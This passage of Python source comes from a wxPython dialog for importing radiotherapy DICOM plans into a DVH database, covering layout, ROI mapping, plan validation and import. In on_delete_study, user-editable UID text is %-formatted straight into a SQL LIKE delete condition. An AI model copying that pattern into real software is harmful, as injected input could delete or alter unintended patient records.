"physician": "Physician:",
"tx_site": "Tx Site:",
"rx_dose": "Rx Dose (Gy):",
"physician_roi": "Physician's ROI Label:",
"roi_type": "ROI Type:",
}
self.label = {
key: wx.StaticText(self, wx.ID_ANY, label)
for key, label in labels.items()
}
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
sizer_warning = wx.BoxSizer(wx.HORIZONTAL)
sizer_warning_buttons = wx.BoxSizer(wx.HORIZONTAL)
sizer_main = wx.BoxSizer(wx.HORIZONTAL)
sizer_roi_map_wrapper = wx.BoxSizer(wx.HORIZONTAL)
sizer_roi_map = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, "ROI Mapping for Selected Study"),
wx.VERTICAL,
)
sizer_selected_roi = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, "Map for Selected ROI"), wx.VERTICAL
)
sizer_roi_type = wx.BoxSizer(wx.VERTICAL)
sizer_physician_roi = wx.BoxSizer(wx.VERTICAL)
sizer_roi_tree = wx.BoxSizer(wx.HORIZONTAL)
sizer_plan_data_wrapper = wx.BoxSizer(wx.HORIZONTAL)
sizer_plan_data = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, "Plan Data for Selected Study"),
wx.VERTICAL,
)
sizer_rx = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_rx_fx_grp_input = wx.BoxSizer(wx.HORIZONTAL)
sizer_rx_input = wx.BoxSizer(wx.VERTICAL)
# sizer_fx_grp_input = wx.BoxSizer(wx.VERTICAL)
sizer_checkbox_rx = wx.BoxSizer(wx.HORIZONTAL)
sizer_tx_site = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_tx_site_checkbox = wx.BoxSizer(wx.HORIZONTAL)
sizer_physician = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_physician_input = wx.BoxSizer(wx.VERTICAL)
sizer_physician_input_and_button = wx.BoxSizer(wx.HORIZONTAL)
sizer_physician_checkbox = wx.BoxSizer(wx.HORIZONTAL)
sizer_sim_study_date = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_sim_study_date_text_button = wx.BoxSizer(wx.HORIZONTAL)
sizer_sim_study_date_checkbox = wx.BoxSizer(wx.HORIZONTAL)
sizer_birth_date = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_birth_date_text_button = wx.BoxSizer(wx.HORIZONTAL)
sizer_birth_date_checkbox = wx.BoxSizer(wx.HORIZONTAL)
sizer_uid = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_mrn = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_browse_and_tree = wx.BoxSizer(wx.VERTICAL)
sizer_studies = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, "Studies"), wx.VERTICAL
)
sizer_studies_checkboxes = wx.BoxSizer(wx.HORIZONTAL)
sizer_progress = wx.BoxSizer(wx.HORIZONTAL)
sizer_tree = wx.BoxSizer(wx.HORIZONTAL)
sizer_dicom_import_directory = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, "DICOM Import Directory"),
wx.VERTICAL,
)
sizer_directory = wx.BoxSizer(wx.VERTICAL)
sizer_import_checkboxes = wx.BoxSizer(wx.HORIZONTAL)
sizer_browse = wx.BoxSizer(wx.HORIZONTAL)
sizer_browse.Add(self.text_ctrl_directory, 1, wx.ALL | wx.EXPAND, 5)
sizer_browse.Add(self.button_browse, 0, wx.ALL, 5)
sizer_directory.Add(sizer_browse, 1, wx.EXPAND, 0)
sizer_import_checkboxes.Add(self.checkbox_subfolders, 0, wx.LEFT, 10)
sizer_import_checkboxes.Add(
self.checkbox_keep_in_inbox, 0, wx.LEFT, 10
)
sizer_directory.Add(sizer_import_checkboxes, 1, wx.EXPAND, 0)
sizer_directory.Add(self.checkbox_copy_misc_files, 0, wx.LEFT, 10)
sizer_dicom_import_directory.Add(sizer_directory, 1, wx.EXPAND, 0)
sizer_browse_and_tree.Add(
sizer_dicom_import_directory, 0, wx.ALL | wx.EXPAND, 10
)
label_note = wx.StaticText(
self,
wx.ID_ANY,
"NOTE: Only the latest files for a plan-set will be used/shown.",
)
label_note.SetFont(
wx.Font(
10,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
sizer_studies.Add(label_note, 0, wx.ALL, 5)
sizer_tree.Add(self.tree_ctrl_import, 1, wx.EXPAND, 0)
self.panel_study_tree.SetSizer(sizer_tree)
sizer_studies.Add(self.panel_study_tree, 1, wx.ALL | wx.EXPAND, 5)
sizer_studies_checkboxes.Add(
self.checkbox_include_uncategorized, 0, wx.RIGHT, 10
)
sizer_studies_checkboxes.Add(self.checkbox_auto_sum_dose, 0, 0, 0)
sizer_studies.Add(sizer_studies_checkboxes, 0, wx.LEFT | wx.EXPAND, 10)
self.label_progress = wx.StaticText(self, wx.ID_ANY, "")
self.label_progress.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
sizer_progress.Add(self.label_progress, 1, wx.ALL, 10)
sizer_studies.Add(sizer_progress, 0, wx.EXPAND | wx.RIGHT, 5)
sizer_browse_and_tree.Add(
sizer_studies, 1, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10
)
sizer_main.Add(sizer_browse_and_tree, 1, wx.EXPAND, 0)
sizer_mrn.Add(self.label["mrn"], 0, 0, 0)
sizer_mrn.Add(self.input["mrn"], 0, wx.EXPAND, 0)
sizer_plan_data.Add(sizer_mrn, 1, wx.ALL | wx.EXPAND, 5)
sizer_uid.Add(self.label["study_instance_uid"], 0, 0, 0)
sizer_uid.Add(self.input["study_instance_uid"], 0, wx.EXPAND, 0)
sizer_uid.Add(self.button_delete_study, 0, wx.ALL | wx.ALIGN_CENTER, 5)
sizer_plan_data.Add(sizer_uid, 1, wx.ALL | wx.EXPAND, 5)
sizer_birth_date.Add(self.label["birth_date"], 0, 0, 0)
sizer_birth_date_text_button.Add(self.input["birth_date"], 0, 0, 0)
sizer_birth_date_text_button.Add(
self.button_edit_birth_date, 0, wx.LEFT, 10
)
sizer_birth_date_checkbox.Add(
self.checkbox["birth_date_1"], 0, wx.RIGHT, 20
)
sizer_birth_date_checkbox.Add(self.checkbox["birth_date_2"], 0, 0, 0)
sizer_birth_date.Add(sizer_birth_date_text_button, 0, 0, 0)
sizer_birth_date.Add(sizer_birth_date_checkbox, 1, wx.EXPAND, 0)
sizer_plan_data.Add(sizer_birth_date, 1, wx.ALL | wx.EXPAND, 5)
sizer_sim_study_date.Add(self.label["sim_study_date"], 0, 0, 0)
sizer_sim_study_date_text_button.Add(
self.input["sim_study_date"], 0, 0, 0
)
sizer_sim_study_date_text_button.Add(
self.button_edit_sim_study_date, 0, wx.LEFT, 10
)
sizer_sim_study_date_checkbox.Add(
self.checkbox["sim_study_date_1"], 0, wx.RIGHT, 20
)
sizer_sim_study_date_checkbox.Add(
self.checkbox["sim_study_date_2"], 0, 0, 0
)
sizer_sim_study_date.Add(sizer_sim_study_date_text_button, 0, 0, 0)
sizer_sim_study_date.Add(
sizer_sim_study_date_checkbox, 1, wx.EXPAND, 0
)
sizer_plan_data.Add(sizer_sim_study_date, 1, wx.ALL | wx.EXPAND, 5)
sizer_physician_input.Add(self.label["physician"], 0, 0, 0)
sizer_physician_input_and_button.Add(self.input["physician"], 0, 0, 0)
sizer_physician_input_and_button.Add(
self.button_add_physician, 0, wx.LEFT, 5
)
sizer_physician_checkbox.Add(
self.checkbox["physician_1"], 0, wx.RIGHT, 20
)
sizer_physician_checkbox.Add(self.checkbox["physician_2"], 0, 0, 0)
sizer_physician.Add(sizer_physician_input, 0, 0, 0)
sizer_physician.Add(sizer_physician_input_and_button, 0, wx.EXPAND, 0)
sizer_physician.Add(sizer_physician_checkbox, 1, wx.EXPAND, 0)
sizer_plan_data.Add(sizer_physician, 1, wx.ALL | wx.EXPAND, 5)
sizer_tx_site.Add(self.label["tx_site"], 0, 0, 0)
sizer_tx_site.Add(self.input["tx_site"], 0, wx.EXPAND, 0)
sizer_tx_site_checkbox.Add(self.checkbox["tx_site_1"], 0, wx.RIGHT, 20)
sizer_tx_site_checkbox.Add(self.checkbox["tx_site_2"], 0, 0, 0)
sizer_tx_site.Add(sizer_tx_site_checkbox, 1, wx.EXPAND, 0)
sizer_plan_data.Add(sizer_tx_site, 1, wx.ALL | wx.EXPAND, 5)
# self.label['fx_grp'] = wx.StaticText(self, wx.ID_ANY, "Fx Group:")
sizer_rx_input.Add(self.label["rx_dose"], 0, 0, 0)
sizer_rx_input.Add(self.input["rx_dose"], 0, 0, 0)
# sizer_fx_grp_input.Add(self.label['fx_grp'], 0, wx.LEFT, 20)
# sizer_fx_grp_input.Add(self.input['fx_grp'], 0, wx.LEFT, 20)
sizer_rx_fx_grp_input.Add(sizer_rx_input, 0, 0, 0)
# sizer_rx_fx_grp_input.Add(sizer_fx_grp_input, 0, 0, 0)
sizer_rx.Add(sizer_rx_fx_grp_input, 0, 0, 0)
sizer_checkbox_rx.Add(self.checkbox["rx_dose_1"], 0, wx.RIGHT, 20)
sizer_checkbox_rx.Add(self.checkbox["rx_dose_2"], 0, 0, 0)
sizer_rx.Add(sizer_checkbox_rx, 1, wx.EXPAND, 0)
sizer_plan_data.Add(sizer_rx, 1, wx.ALL | wx.EXPAND, 5)
sizer_plan_data.Add(
self.button_apply_plan_data, 0, wx.ALL | wx.EXPAND, 5
)
sizer_plan_data_wrapper.Add(sizer_plan_data, 1, wx.ALL | wx.EXPAND, 10)
sizer_main.Add(sizer_plan_data_wrapper, 1, wx.EXPAND, 0)
sizer_roi_tree.Add(self.tree_ctrl_roi, 1, wx.ALL | wx.EXPAND, 0)
self.panel_roi_tree.SetSizer(sizer_roi_tree)
sizer_roi_map.Add(self.panel_roi_tree, 1, wx.EXPAND, 0)
sizer_roi_map.Add(self.button_roi_manager, 0, wx.EXPAND | wx.ALL, 5)
sizer_physician_roi_with_add = wx.BoxSizer(wx.HORIZONTAL)
sizer_physician_roi.Add(self.label["physician_roi"], 0, 0, 0)
sizer_physician_roi.Add(self.input_roi["physician"], 0, wx.EXPAND, 0)
sizer_physician_roi_with_add.Add(sizer_physician_roi, 1, wx.EXPAND, 0)
sizer_roi_type_with_add = wx.BoxSizer(wx.HORIZONTAL)
sizer_roi_type_store_in_map = wx.BoxSizer(wx.VERTICAL)
sizer_roi_type.Add(self.label["roi_type"], 0, 0, 0)
sizer_roi_type.Add(self.input_roi["type"], 0, wx.EXPAND, 0)
sizer_roi_type_store_in_map.Add((20, 18), 0, 0, 0)
sizer_roi_type_store_in_map.Add(
self.button_save_roi_type_in_map,
0,
wx.EXPAND | wx.LEFT | wx.RIGHT,
5,
)
sizer_roi_type_with_add.Add(sizer_roi_type, 1, wx.EXPAND, 0)
sizer_roi_type_with_add.Add(
sizer_roi_type_store_in_map, 0, wx.EXPAND, 0
)
sizer_selected_roi.Add(
sizer_physician_roi_with_add, 1, wx.ALL | wx.EXPAND, 5
)
sizer_selected_roi.Add(
sizer_roi_type_with_add, 1, wx.ALL | wx.EXPAND, 5
)
sizer_roi_map.Add(sizer_selected_roi, 0, wx.EXPAND, 0)
sizer_roi_map_wrapper.Add(sizer_roi_map, 1, wx.ALL | wx.EXPAND, 10)
sizer_main.Add(sizer_roi_map_wrapper, 1, wx.EXPAND, 0)
sizer_wrapper.Add(sizer_main, 1, wx.EXPAND, 0)
self.label_warning = wx.StaticText(self, wx.ID_ANY, "")
sizer_warning.Add(self.label_warning, 1, wx.EXPAND, 0)
sizer_warning_buttons.Add(sizer_warning, 1, wx.ALL | wx.EXPAND, 5)
# sizer_buttons.Add(self.button_assign_ptv_test, 0, wx.ALL, 5)
sizer_buttons.Add(self.button_preprocess, 0, wx.ALL, 5)
sizer_buttons.Add(self.button_save_roi_map, 0, wx.ALL, 5)
sizer_buttons.Add(self.button_import, 0, wx.ALL, 5)
sizer_buttons.Add(self.button_cancel, 0, wx.ALL, 5)
sizer_warning_buttons.Add(
sizer_buttons, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT, 5
)
sizer_wrapper.Add(sizer_warning_buttons, 0, wx.ALL | wx.EXPAND, 5)
self.SetSizer(sizer_wrapper)
self.Layout()
self.Center()
def run(self):
self.Show()
if self.inbox is not None and isdir(self.inbox):
inbox = self.inbox
elif isdir(self.options.INBOX_DIR):
inbox = self.options.INBOX_DIR
else:
inbox = ""
self.text_ctrl_directory.SetValue(inbox)
if self.auto_parse:
self.dicom_importer = self.get_importer()
def on_cancel(self, evt):
self.roi_map.import_from_file() # reload from file, ignore changes
# pub.unsubscribe(self.parse_dicom_data, "parse_dicom_data")
# pub.unsubscribe(self.set_pre_import_parsed_dicom_data, 'set_pre_import_parsed_dicom_data')
# pub.unsubscribe(self.pre_import_complete, "pre_import_complete")
pub.sendMessage("import_dicom_cancel")
self.do_unsubscribe()
self.Destroy()
@staticmethod
def do_unsubscribe():
pub.unsubAll(topicName="parse_dicom_data")
pub.unsubAll(topicName="set_pre_import_parsed_dicom_data")
pub.unsubAll(topicName="pre_import_complete")
pub.unsubAll(topicName="pre_import_canceled")
pub.unsubAll(topicName="build_dicom_file_tree")
def on_save_roi_map(self, evt):
RemapROIFrame(self.roi_map)
def on_preprocess(self, evt):
self.PreprocessDicom = PreprocessDicom(self)
def on_browse(self, evt):
"""
Clear data, open a DirDialog, run a DicomTreeBuilder on selected directory
"""
starting_dir = self.text_ctrl_directory.GetValue()
if starting_dir == "":
starting_dir = self.start_path
if not isdir(starting_dir):
starting_dir = ""
dlg = wx.DirDialog(
self,
"Select inbox directory",
starting_dir,
wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
)
if dlg.ShowModal() == wx.ID_OK:
self.build_dicom_file_tree(dlg.GetPath())
def build_dicom_file_tree(self, directory):
self.parsed_dicom_data = {}
for key in list(self.global_plan_over_rides):
self.global_plan_over_rides[key] = {
"value": None,
"only_if_missing": False,
}
self.clear_plan_data()
if self.dicom_importer:
self.tree_ctrl_roi.DeleteChildren(self.dicom_importer.root_rois)
self.text_ctrl_directory.SetValue(directory)
self.dicom_importer = self.get_importer()
self.PreprocessDicom = None
def get_importer(self):
return DicomTreeBuilder(
self.text_ctrl_directory.GetValue(),
self.tree_ctrl_import,
self.tree_ctrl_roi,
self.tree_ctrl_roi_root,
self.tree_ctrl_images,
self.roi_map,
search_subfolders=self.checkbox_subfolders.GetValue(),
)
def on_file_tree_select(self, evt):
"""
On selection of an item in the file tree, update the plan dependent elements of the Frame
"""
uid = self.get_file_tree_item_plan_uid(evt.GetItem())
self.tree_ctrl_roi.SelectItem(self.tree_ctrl_roi_root, True)
if (
uid in list(self.parsed_dicom_data)
and self.parsed_dicom_data[uid].validation["complete_file_set"]
):
if uid != self.selected_uid:
self.selected_uid = uid
wx.BeginBusyCursor()
self.dicom_importer.rebuild_tree_ctrl_rois(uid)
self.tree_ctrl_roi.ExpandAll()
data = self.parsed_dicom_data[uid]
self.input["mrn"].SetValue(data.mrn)
self.input["study_instance_uid"].SetValue(
data.study_instance_uid_to_be_imported
)
if data.birth_date is None or data.birth_date == "":
self.input["birth_date"].SetValue("")
else:
self.input["birth_date"].SetValue(
datetime_to_date_string(data.birth_date)
)
if data.sim_study_date is None or data.sim_study_date == "":
self.input["sim_study_date"].SetValue("")
else:
self.input["sim_study_date"].SetValue(
datetime_to_date_string(data.sim_study_date)
)
physician = ["DEFAULT", data.physician][
data.physician in self.roi_map.get_physicians()
]
self.input["physician"].SetValue(physician)
self.input["tx_site"].SetValue(data.tx_site)
self.input["rx_dose"].SetValue(str(data.rx_dose))
self.dicom_importer.update_mapped_roi_status(data.physician)
self.update_all_roi_text_with_roi_type()
wx.EndBusyCursor()
self.update_physician_roi_choices()
self.enable_inputs()
else:
self.clear_plan_data()
self.enable_inputs(False)
self.selected_uid = None
self.tree_ctrl_roi.DeleteChildren(self.dicom_importer.root_rois)
self.selected_uid = uid
self.update_warning_label()
def on_roi_tree_select(self, evt):
self.allow_input_roi_apply = False
self.selected_roi = self.get_roi_tree_item_name(evt.GetItem())
self.update_roi_inputs()
self.allow_input_roi_apply = True
def roi_tree_right_click_action(self, physician, roi_name, dlg, *evt):
dlg(self, physician, self.roi_map, roi_name)
self.update_roi_inputs()
self.dicom_importer.update_mapped_roi_status(physician)
def on_roi_tree_right_click(self, evt):
if (
evt.GetItem().GetParent() is not None
): # ignore right click on tree root node
roi_name = (
evt.GetItem().GetText().split(" ----- ")[0]
) # remove PTV flags
physician = self.input["physician"].GetValue()
is_mapped = not evt.GetItem().GetImage()
# TODO: This block of code works, but is overly complicated
msg_prepend = "%s %s as" % (["Add", "Remove"][is_mapped], roi_name)
labels = [
"%s %s" % (msg_prepend, roi_type)
for roi_type in ["Physician ROI", "Variation"]
]
if is_mapped:
if self.roi_map.is_physician_roi(roi_name, physician):
dlg_objects = [DelPhysicianROI]
labels = [labels[0]]
else:
dlg_objects = [DelVariation]
labels = [labels[1]]
else:
dlg_objects = [AddPhysicianROI, AssignVariation]
pre_func = partial(
self.roi_tree_right_click_action, physician, roi_name
)
popup = PopupMenu(self)
for i, label in enumerate(labels):
if self.input["physician"].GetValue() != "DEFAULT":
popup.add_menu_item(
label, partial(pre_func, dlg_objects[i])
)
# if is_mapped:
# popup.add_menu_item("Do Not Import", partial(pre_func, dlg_objects[0]))
popup.add_menu_item(
"Edit ROI Name", partial(self.change_plan_roi_name, evt)
)
popup.run()
def change_plan_roi_name(self, evt_tree, *evt):
ChangePlanROIName(
self.tree_ctrl_roi,
evt_tree.GetItem(),
self.selected_uid,
self.parsed_dicom_data[self.selected_uid],
self.dicom_importer,
)
self.dicom_importer.update_mapped_roi_status(
self.input["physician"].GetValue()
)
self.update_physician_roi_choices()
def update_input_roi_physician_enable(self):
if self.selected_roi:
if self.input_roi["physician"].GetValue() == "uncategorized":
self.input_roi["physician"].Enable()
self.button_save_roi_type_in_map.Disable()
else:
self.input_roi["physician"].Disable()
self.button_save_roi_type_in_map.Enable()
self.input_roi["type"].Enable()
else:
self.input_roi["physician"].Disable()
self.input_roi["type"].Disable()
self.button_save_roi_type_in_map.Disable()
def update_roi_inputs(self):
self.allow_input_roi_apply = False
physician = self.input["physician"].GetValue()
if self.selected_roi and self.roi_map.is_physician(physician) and \
self.selected_roi in self.dicom_importer.roi_name_map:
physician_roi = self.roi_map.get_physician_roi(
physician, self.selected_roi
)
roi_key = self.dicom_importer.roi_name_map[self.selected_roi][
"key"
]
uid = self.selected_uid
roi_type = self.parsed_dicom_data[uid].get_roi_type(roi_key)
self.input_roi["physician"].SetValue(physician_roi)
self.update_physician_roi_choices(physician_roi)
self.input_roi["type"].SetValue(roi_type)
self.update_roi_text_with_roi_type(self.selected_roi, roi_type)
else:
self.input_roi["physician"].SetValue("")
self.input_roi["type"].SetValue("")
self.allow_input_roi_apply = True
self.update_input_roi_physician_enable()
def update_roi_text_with_roi_type(self, roi, roi_type):
roi_type_for_tree_text = [None, "PTV"][roi_type == "PTV"]
self.dicom_importer.update_tree_ctrl_roi_with_roi_type(
roi, roi_type=roi_type_for_tree_text
)
def update_all_roi_text_with_roi_type(self):
self.parsed_dicom_data[self.selected_uid].autodetect_target_roi_type()
for roi in list(self.dicom_importer.roi_name_map):
roi_key = self.dicom_importer.roi_name_map[roi]["key"]
roi_type = self.parsed_dicom_data[self.selected_uid].get_roi_type(
roi_key
)
self.update_roi_text_with_roi_type(roi, roi_type)
def clear_plan_data(self):
for input_obj in self.input.values():
input_obj.SetValue("")
self.reset_label_colors()
def get_file_tree_item_plan_uid(self, item):
plan_node = None
node_id, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(item)
if node_type == "plan":
plan_node = item
elif node_type == "study":
plan_node, valid = self.tree_ctrl_import.GetFirstChild(item)
elif node_type == "patient":
study_node, valid = self.tree_ctrl_import.GetFirstChild(item)
plan_node, valid = self.tree_ctrl_import.GetFirstChild(study_node)
if plan_node is not None:
uid, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(
plan_node
)
return uid
def get_file_tree_item_study_uid(self, item):
study_node = None
node_id, node_type = self.dicom_importer.get_id_of_tree_ctrl_node(item)
if node_type == "study":
study_node = item
elif node_type == "plan":
study_node, valid = self.tree_ctrl_import.GetItemParent(item)
elif node_type == "patient":
study_node, valid = self.tree_ctrl_import.GetFirstChild(item)
if study_node:
return self.dicom_importer.node_to_study_uid[study_node]
def get_roi_tree_item_name(self, item):
for name, node in self.dicom_importer.roi_nodes.items():
if item == node:
return name
return None
def on_text_change(self, evt):
for key, input_obj in self.input.items():
if input_obj.GetId() == evt.GetId():
self.update_label_text_color(key)
return
def on_physician_change(self):
self.update_physician_roi_choices()
physician = self.input["physician"].GetValue()
if physician:
self.enable_roi_inputs()
else:
self.disable_roi_inputs()
self.update_roi_inputs()
self.dicom_importer.update_mapped_roi_status(physician)
self.update_roi_inputs()
def update_label_text_color(self, key):
red_value = [255, 0][self.input[key].GetValue() != ""]
self.label[key].SetForegroundColour(wx.Colour(red_value, 0, 0))
def reset_label_colors(self):
for label in self.label.values():
label.SetForegroundColour(wx.Colour(0, 0, 0))
def enable_inputs(self, *arg):
if arg:
enable = arg[0]
else:
enable = True
for input_obj in self.input.values():
input_obj.Enable(enable)
self.button_edit_sim_study_date.Enable(enable)
self.button_edit_birth_date.Enable(enable)
self.button_apply_plan_data.Enable(enable)
self.button_roi_manager.Enable(enable)
self.button_delete_study.Enable(enable)
self.button_add_physician.Enable(enable)
for check_box in self.checkbox.values():
check_box.Enable(enable)
def disable_roi_inputs(self):
for input_obj in self.input_roi.values():
input_obj.Disable()
self.button_save_roi_type_in_map.Disable()
def enable_roi_inputs(self):
for key, input_obj in self.input_roi.items():
if key not in {"physician", "type"}:
input_obj.Enable()
def update_physician_roi_choices(self, physician_roi=None):
physician = self.input["physician"].GetValue()
if self.roi_map.is_physician(physician):
choices = self.roi_map.get_physician_rois(physician)
else:
choices = []
if choices and physician_roi in {"uncategorized"}:
choices = list(
set(choices)
- set(self.dicom_importer.get_used_physician_rois(physician))
)
choices.sort()
choices.append("uncategorized")
self.input_roi["physician"].Clear()
self.input_roi["physician"].Append(choices)
if physician_roi is not None:
self.input_roi["physician"].SetValue(physician_roi)
def on_apply_plan(self, evt):
wx.BeginBusyCursor()
current_physician = self.input["physician"].GetValue()
self.on_physician_change()
over_rides = self.parsed_dicom_data[self.selected_uid].plan_over_rides
apply_all_selected = False
for key in list(over_rides):
value = self.input[key].GetValue()
if "date" in key:
value = self.validate_date(value)
elif key == "rx_dose":
value = self.validate_dose(value)
else:
if not value:
value = None
over_rides[key] = value
# Apply all
if "%s_1" % key in list(self.checkbox):
apply_all_selected = True
if self.checkbox["%s_1" % key].IsChecked():
self.global_plan_over_rides[key]["value"] = value
self.global_plan_over_rides[key][
"only_if_missing"
] = self.checkbox["%s_2" % key].IsChecked()
self.clear_plan_check_boxes()
if apply_all_selected:
self.validate()
else:
self.validate(uid=self.selected_uid)
if current_physician != self.input["physician"]:
self.update_all_roi_text_with_roi_type()
self.update_warning_label()
wx.EndBusyCursor()
def on_apply_roi(self, evt):
if self.allow_input_roi_apply:
roi_type_over_ride = self.parsed_dicom_data[
self.selected_uid
].roi_over_ride["type"]
key = self.dicom_importer.roi_name_map[self.selected_roi]["key"]
roi_type_over_ride[key] = self.input_roi["type"].GetValue()
self.validate(uid=self.selected_uid)
self.update_warning_label()
self.dicom_importer.update_mapped_roi_status(
self.input["physician"].GetValue()
)
self.update_roi_text_with_roi_type(
self.selected_roi, roi_type=self.input_roi["type"].GetValue()
)
@staticmethod
def validate_date(date):
try:
dt = parse_date(date)
truncated = datetime_obj(dt.year, dt.month, dt.day)
return str(truncated).replace("-", "")
except Exception:
return None
@staticmethod
def validate_dose(dose):
try:
return float(dose)
except ValueError:
return None
@staticmethod
def is_uid_valid(uid):
with DVH_SQL() as cnx:
valid_uid = not cnx.is_study_instance_uid_in_table("Plans", uid)
if valid_uid:
return True
return False
def clear_plan_check_boxes(self):
for checkbox in self.checkbox.values():
checkbox.SetValue(False)
def on_check_apply_all(self, evt):
for key in [
"birth_date",
"sim_study_date",
"physician",
"tx_site",
"rx_dose",
]:
if self.checkbox["%s_1" % key].GetId() == evt.GetId():
if not self.checkbox["%s_1" % key].IsChecked():
self.checkbox["%s_2" % key].SetValue(False)
return
if self.checkbox["%s_2" % key].GetId() == evt.GetId():
if self.checkbox["%s_2" % key].IsChecked():
self.checkbox["%s_1" % key].SetValue(True)
return
def on_import(self, evt):
if self.parsed_dicom_data and self.dicom_importer.checked_plans:
if sql_write_test()["write"]:
# self.patient_orientation_warning()
self.roi_map.write_to_file()
self.options.set_option(
"KEEP_IN_INBOX", self.checkbox_keep_in_inbox.GetValue()
)
self.options.set_option(
"AUTO_SUM_DOSE", self.checkbox_auto_sum_dose.GetValue()
)
self.options.set_option(
"COPY_MISC_FILES", self.checkbox_copy_misc_files.GetValue()
)
self.options.save()
study_uid_dict = get_study_uid_dict(
list(self.dicom_importer.checked_plans),
self.parsed_dicom_data,
multi_plan_only=True,
)
finish_import = True
if (
study_uid_dict
and not self.checkbox_auto_sum_dose.GetValue()
):
dlg = AssignPTV(
self, self.parsed_dicom_data, study_uid_dict
)
dlg.ShowModal()
finish_import = dlg.continue_status
if finish_import:
ImportWorker(
self.parsed_dicom_data,
list(self.dicom_importer.checked_plans),
self.checkbox_include_uncategorized.GetValue(),
self.dicom_importer.other_dicom_files,
self.start_path,
self.checkbox_keep_in_inbox.GetValue(),
self.roi_map,
self.options.USE_DICOM_DVH,
self.checkbox_auto_sum_dose.GetValue(),
self.checkbox_copy_misc_files.GetValue(),
)
dlg = ImportStatusDialog()
# calling self.Close() below caused issues in Windows if Show() used instead of ShowModal()
[dlg.Show, dlg.ShowModal][is_windows()]()
self.Close()
self.do_unsubscribe()
else:
dlg = wx.MessageDialog(
self,
"Unable to write to SQL DB!",
caption="SQL Connection Failure",
style=wx.OK
| wx.OK_DEFAULT
| wx.CENTER
| wx.ICON_EXCLAMATION,
)
dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(
self,
"No plans have been selected.",
caption="Import Failure",
style=wx.OK | wx.OK_DEFAULT | wx.CENTER | wx.ICON_EXCLAMATION,
)
dlg.ShowModal()
dlg.Destroy()
def parse_dicom_data(self):
PreImportFileSetParserWorker(
self.dicom_importer.dicom_file_paths,
self.dicom_importer.other_dicom_files,
)
def pre_import_complete(self):
self.label_progress.SetLabelText(
"Plan count: %s" % len(list(self.dicom_importer.plan_nodes))
)
self.is_all_data_parsed = True
wx.CallAfter(self.validate)
def pre_import_canceled(self):
self.label_progress.SetLabelText("")
self.label_warning.SetLabelText("Parsing Canceled")
def set_pre_import_parsed_dicom_data(self, msg):
uid = msg["uid"]
self.parsed_dicom_data[uid] = PreImportData(**msg["init_params"])
self.parsed_dicom_data[
uid
].global_plan_over_rides = self.global_plan_over_rides
if not self.parsed_dicom_data[uid].ptv_exists:
self.parsed_dicom_data[uid].autodetect_target_roi_type()
self.validate(uid)
self.update_warning_label()
self.update_roi_inputs()
def validate(self, uid=None):
red = wx.Colour(255, 0, 0)
orange = wx.Colour(255, 165, 0)
yellow = wx.Colour(255, 255, 0)
if self.is_all_data_parsed:
if not uid:
nodes = self.dicom_importer.plan_nodes
else:
nodes = {uid: self.dicom_importer.plan_nodes[uid]}
for node_uid, node in nodes.items():
if node_uid in list(self.parsed_dicom_data):
validation = self.parsed_dicom_data[node_uid].validation
failed_keys = {
key
for key, value in validation.items()
if not value["status"]
}
else:
failed_keys = {"complete_file_set"}
if failed_keys:
if {
"study_instance_uid",
"complete_file_set",
}.intersection(failed_keys):
color = red
elif {"physician", "ptv"}.intersection(failed_keys):
color = orange
else:
color = yellow
elif node_uid in self.dicom_importer.incomplete_plans:
color = red
else:
color = None
self.tree_ctrl_import.SetItemBackgroundColour(node, color)
if node_uid is not None:
self.tree_ctrl_import.CheckItem(node, color != red)
def update_warning_label(self):
msg = ""
if self.selected_uid:
if self.selected_uid in list(self.parsed_dicom_data):
warning = self.parsed_dicom_data[self.selected_uid].warning
msg = warning["label"]
if (
warning["incomplete"]
and self.selected_uid not in self.incomplete_studies
):
self.incomplete_studies.append(self.selected_uid)
else:
msg = "ERROR: Incomplete Fileset. RT Plan, Dose, and Structure required."
self.label_warning.SetLabelText(msg)
def on_delete_study(self, evt):
uid = self.input["study_instance_uid"].GetValue()
with DVH_SQL() as cnx:
if cnx.is_uid_imported(uid):
dlg = wx.MessageDialog(
self,
"Delete all data in database with this UID?",
caption="Delete Study",
style=wx.YES
| wx.NO
| wx.NO_DEFAULT
| wx.CENTER
| wx.ICON_EXCLAMATION,
)
else:
dlg = wx.MessageDialog(
self,
"Study Instance UID not found in Database",
caption="Delete Study",
style=wx.OK | wx.CENTER | wx.ICON_EXCLAMATION,
)
res = dlg.ShowModal()
dlg.Center()
if res == wx.ID_YES:
# As of DVH v0.7.5, study_instance_uid may end with _N where N is the nth plan of a file set
cnx.delete_rows("study_instance_uid LIKE '%s%%'" % uid)
dlg.Destroy()
self.validate() # Eclipse plans may have multiple plan UIDs for the same case, re-validate all plans
self.update_warning_label()
def on_edit_birth_date(self, evt):
self.on_edit_date("birth_date")
